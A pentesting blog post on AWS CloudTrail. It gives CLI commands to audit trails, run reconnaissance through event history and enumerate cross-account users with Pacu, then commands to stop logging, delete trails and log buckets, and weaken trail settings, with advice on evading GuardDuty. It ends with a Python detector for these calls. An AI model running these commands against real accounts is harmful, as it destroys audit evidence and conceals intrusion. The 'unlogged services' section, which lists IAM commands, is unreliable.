AWS Penetration Testing Part - 6: AWS CloudTrail Techniques, Bypasses, and Secure Configurations

March 17, 2025
Tags: AWS Security, Pentesting, CloudTrail

Pentesting AWS CloudTrail

CloudTrail is the central AWS logging service used for governance, compliance, and auditing. This post explores how attackers audit, bypass, or disrupt CloudTrail, and how defenders can secure it effectively.

๐Ÿ” Auditing with CLI

    aws cloudtrail describe-trails --include-shadow-trails
    aws cloudtrail get-event-selectors --trail-name ExampleTrail --region us-east-1
    aws cloudtrail get-trail-status --name ExampleTrail --region us-east-1

Check:

  • IsMultiRegionTrail: Should be true
  • IncludeGlobalServiceEvents: Should be true
  • LogFileValidationEnabled: Should be true
  • KmsKeyId: Should exist

Reconnaissance via Event History

CloudTrail Event History stores 90 days of API activity and can be queried via:

    aws cloudtrail lookup-events

Useful for:

  • Determining active users/services
  • Gathering instance IDs without DescribeInstances by looking at ModifyInstance or similar events

Bypassing CloudTrail

Using Unsupported Services

CloudTrail does not log all services. Examples:

  • AppStream 2.0
  • Amplify
  • Cloud9

Exploit unlogged services and observe:

    aws iam get-credential-report
    aws iam generate-service-last-accessed-details --arn arn:aws:iam::<acct>:user/<user>

Cross Account User Enumeration (Undetected)

With your own AWS account, using Pacu:

    run iam__enum_users --account-id 000000000000 --role-name TestRole

Similarly, enumerate roles:

    run iam__enum_roles --account-id 000000000000 --role-name TestRole

Disrupting Logging

Stop Logging

    aws cloudtrail stop-logging --name ExampleTrail

Delete Trail or S3 Bucket

    aws cloudtrail delete-trail --name ExampleTrail
    aws s3api delete-bucket --bucket example-for-cloudtrail-logs

Minify Logging

    aws cloudtrail update-trail --name ExampleTrail --no-include-global-service-events --no-is-multi-region-trail --no-enable-log-file-validation --kms-key-id ""

Disable all data event logging with the following event_selectors.json:

    [
      {
        "ReadWriteType": "ReadOnly",
        "IncludeManagementEvents": true,
        "DataResources": []
      }
    ]

    aws cloudtrail put-event-selectors --trail-name ExampleTrail --event-selectors file://event_selectors.json

GuardDuty Detection

Many logging disruptions trigger GuardDuty alerts like:

  • Stealth:IAMUser/CloudTrailLoggingDisabled
  • Stealth:IAMUser/LoggingConfigurationModified

But machine-learning-based detection may vary. Observe user behavior to mimic historical patterns and reduce detection.
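The disruption calls above (StopLogging, DeleteTrail, the weakening UpdateTrail, and the narrowing PutEventSelectors) are themselves recorded as CloudTrail management events, so a defender can flag them directly rather than relying on GuardDuty alone. The following Python is an added example, not code from the original post: it scans a batch of CloudTrail records for those calls. The records are constructed samples, and the requestParameters field names are assumed to follow CloudTrail's camelCase API naming.

```python
# Constructed sample records (not real events): the disruption calls from this
# post plus one benign DescribeTrails. Field names follow the camelCase that
# CloudTrail uses in requestParameters (assumed, not verified against AWS here).
def rec(event_name, params, user="alice"):
    return {"eventSource": "cloudtrail.amazonaws.com", "eventName": event_name,
            "userIdentity": {"arn": f"arn:aws:iam::000000000000:user/{user}"},
            "requestParameters": params}

SAMPLE_RECORDS = [
    rec("StopLogging", {"name": "ExampleTrail"}),
    rec("UpdateTrail", {"name": "ExampleTrail", "isMultiRegionTrail": False,
                        "includeGlobalServiceEvents": False,
                        "enableLogFileValidation": False, "kmsKeyId": ""}),
    rec("PutEventSelectors", {"trailName": "ExampleTrail", "eventSelectors": [
        {"readWriteType": "ReadOnly", "includeManagementEvents": True,
         "dataResources": []}]}),
    rec("DescribeTrails", {}, user="bob"),
]

HARD_DISRUPTION = {"StopLogging", "DeleteTrail"}
# UpdateTrail parameter -> value that weakens the trail ("Minify Logging" above).
WEAKENING = {"isMultiRegionTrail": False, "includeGlobalServiceEvents": False,
             "enableLogFileValidation": False, "kmsKeyId": ""}

def classify(record):
    """Return a list of finding strings for one record; empty means benign."""
    if record.get("eventSource") != "cloudtrail.amazonaws.com":
        return []
    name = record.get("eventName")
    params = record.get("requestParameters") or {}
    actor = record.get("userIdentity", {}).get("arn", "unknown")
    trail = params.get("name") or params.get("trailName")
    findings = []
    if name in HARD_DISRUPTION:
        findings.append(f"{name} on {trail} by {actor}")
    elif name == "UpdateTrail":
        # Only parameters explicitly set to the weak value are reported.
        weakened = [k for k, bad in WEAKENING.items() if params.get(k) == bad]
        if weakened:
            findings.append(f"UpdateTrail weakened {', '.join(weakened)} on {trail} by {actor}")
    elif name == "PutEventSelectors":
        # ReadOnly drops write events; empty dataResources removes data-event logging.
        if any(s.get("readWriteType") == "ReadOnly" or not s.get("dataResources")
               for s in params.get("eventSelectors") or []):
            findings.append(f"PutEventSelectors narrowed {trail} by {actor}")
    return findings

def scan(records):
    """Findings across one batch of records (e.g. one delivered CloudTrail log file)."""
    return [f for r in records for f in classify(r)]
```

Feed `scan` the `Records` array of a delivered log file; an empty list means no disruption calls were seen in that batch.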